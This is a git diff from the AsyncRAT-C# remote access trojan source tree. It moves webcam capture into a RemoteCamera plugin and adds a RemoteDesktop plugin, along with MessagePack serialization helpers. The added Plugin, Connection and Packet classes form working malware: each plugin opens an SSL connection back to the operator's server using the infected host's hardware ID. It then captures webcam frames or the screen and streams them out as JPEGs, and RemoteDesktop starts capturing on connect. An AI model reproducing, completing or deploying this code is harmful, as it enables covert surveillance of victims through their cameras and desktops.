+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleWebcam.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Packet.cs
similarity index 67%
rename from AsyncRAT-C#/Client/Handle Packet/HandleWebcam.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Packet.cs
index edf7a08..39fb49b 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleWebcam.cs
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Packet.cs
@@ -1,33 +1,29 @@
using AForge.Video;
using AForge.Video.DirectShow;
-using Client.Connection;
-using Client.Helper;
-using Client.MessagePack;
+using Plugin.MessagePack;
using System;
-using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
-using System.Linq;
using System.Text;
using System.Threading;
-namespace Client.Handle_Packet
+namespace Plugin
{
- public static class HandleWebcam
+ public static class Packet
{
- public static bool IsOn = false;
+ public static bool IsOk = false;
public static VideoCaptureDevice FinalVideo;
- public static string HWID = Methods.HWID();
private static MemoryStream Camstream = new MemoryStream();
- private static TempSocket TempSocket = null;
private static int Quality = 50;
- public static void Run(MsgPack unpack_msgpack)
+ public static void Read(object data)
{
try
{
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "webcam":
@@ -36,52 +32,20 @@ namespace Client.Handle_Packet
{
case "getWebcams":
{
- TempSocket?.Dispose();
- TempSocket = new TempSocket();
- if (TempSocket.IsConnected)
- {
- GetWebcams();
- }
- else
- {
- new Thread(() =>
- {
- try
- {
- TempSocket.Dispose();
- CaptureDispose();
- }
- catch { }
- }).Start();
- }
+ GetWebcams();
break;
}
case "capture":
{
- if (IsOn == true) return;
- if (TempSocket.IsConnected)
- {
- IsOn = true;
+ if (IsOk == true) return;
+ IsOk = true;
FilterInfoCollection videoCaptureDevices = new FilterInfoCollection(FilterCategory.VideoInputDevice);
FinalVideo = new VideoCaptureDevice(videoCaptureDevices[0].MonikerString);
Quality = (int)unpack_msgpack.ForcePathObject("Quality").AsInteger;
FinalVideo.NewFrame += CaptureRun;
FinalVideo.VideoResolution = FinalVideo.VideoCapabilities[unpack_msgpack.ForcePathObject("List").AsInteger];
FinalVideo.Start();
- }
- else
- {
- new Thread(() =>
- {
- try
- {
- CaptureDispose();
- TempSocket.Dispose();
- }
- catch { }
- }).Start();
- }
break;
}
@@ -112,9 +76,9 @@ namespace Client.Handle_Packet
{
try
{
- if (TempSocket.IsConnected)
+ if (Connection.IsConnected)
{
- if (IsOn == true)
+ if (IsOk == true)
{
Bitmap image = (Bitmap)e.Frame.Clone();
using (Camstream = new MemoryStream())
@@ -123,7 +87,7 @@ namespace Client.Handle_Packet
EncoderParameters myEncoderParameters = new EncoderParameters(1);
EncoderParameter myEncoderParameter = new EncoderParameter(myEncoder, Quality);
myEncoderParameters.Param[0] = myEncoderParameter;
- ImageCodecInfo jpgEncoder = Methods.GetEncoder(ImageFormat.Jpeg);
+ ImageCodecInfo jpgEncoder = GetEncoder(ImageFormat.Jpeg);
image.Save(Camstream, jpgEncoder, myEncoderParameters);
myEncoderParameters?.Dispose();
myEncoderParameter?.Dispose();
@@ -131,10 +95,10 @@ namespace Client.Handle_Packet
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "webcam";
- msgpack.ForcePathObject("ID").AsString = HWID;
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "capture";
msgpack.ForcePathObject("Image").SetAsBytes(Camstream.ToArray());
- TempSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
Thread.Sleep(1);
}
}
@@ -146,7 +110,7 @@ namespace Client.Handle_Packet
try
{
CaptureDispose();
- TempSocket.Dispose();
+ Connection.Disconnected();
}
catch { }
}).Start();
@@ -159,7 +123,7 @@ namespace Client.Handle_Packet
try
{
CaptureDispose();
- TempSocket.Dispose();
+ Connection.Disconnected();
}
catch { }
}).Start();
@@ -167,7 +131,20 @@ namespace Client.Handle_Packet
}
}
- private static void GetWebcams()
+ private static ImageCodecInfo GetEncoder(ImageFormat format)
+ {
+ ImageCodecInfo[] codecs = ImageCodecInfo.GetImageDecoders();
+ foreach (ImageCodecInfo codec in codecs)
+ {
+ if (codec.FormatID == format.Guid)
+ {
+ return codec;
+ }
+ }
+ return null;
+ }
+
+ public static void GetWebcams()
{
try
{
@@ -184,17 +161,17 @@ namespace Client.Handle_Packet
{
msgpack.ForcePathObject("Packet").AsString = "webcam";
msgpack.ForcePathObject("Command").AsString = "getWebcams";
- msgpack.ForcePathObject("ID").AsString = HWID;
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("List").AsString = deviceInfo.ToString();
}
else
{
msgpack.ForcePathObject("Packet").AsString = "webcam";
msgpack.ForcePathObject("Command").AsString = "getWebcams";
- msgpack.ForcePathObject("ID").AsString = HWID;
- msgpack.ForcePathObject("List").AsString = "None";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
+ msgpack.ForcePathObject("List").AsString = "None-=>";
}
- TempSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
catch { }
}
@@ -203,7 +180,7 @@ namespace Client.Handle_Packet
{
try
{
- IsOn = false;
+ IsOk = false;
FinalVideo.Stop();
FinalVideo.NewFrame -= CaptureRun;
Camstream?.Dispose();
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs
new file mode 100644
index 0000000..9fec2d9
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient();
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..cd588c4
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("619b7612-dfea-442a-a927-d997f99c497b")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj
new file mode 100644
index 0000000..03931e8
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj
@@ -0,0 +1,90 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}
+ Library
+ Properties
+ Plugin
+ RemoteCamera
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+ true
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop.sln b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop.sln
new file mode 100644
index 0000000..5ae6a82
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop.sln
@@ -0,0 +1,24 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteDesktop", "RemoteDesktop\RemoteDesktop.csproj", "{9042B543-13D1-42B3-A5B6-5CC9AD55E150}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {7CFE40D5-9697-4707-BAFB-175B85AB7070}
+ EndGlobalSection
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs
new file mode 100644
index 0000000..fb6d64f
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs
@@ -0,0 +1,212 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient()
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ Packet.IsOk = true;
+ Packet.CaptureAndSend(30, 0);
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Packet.IsOk = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
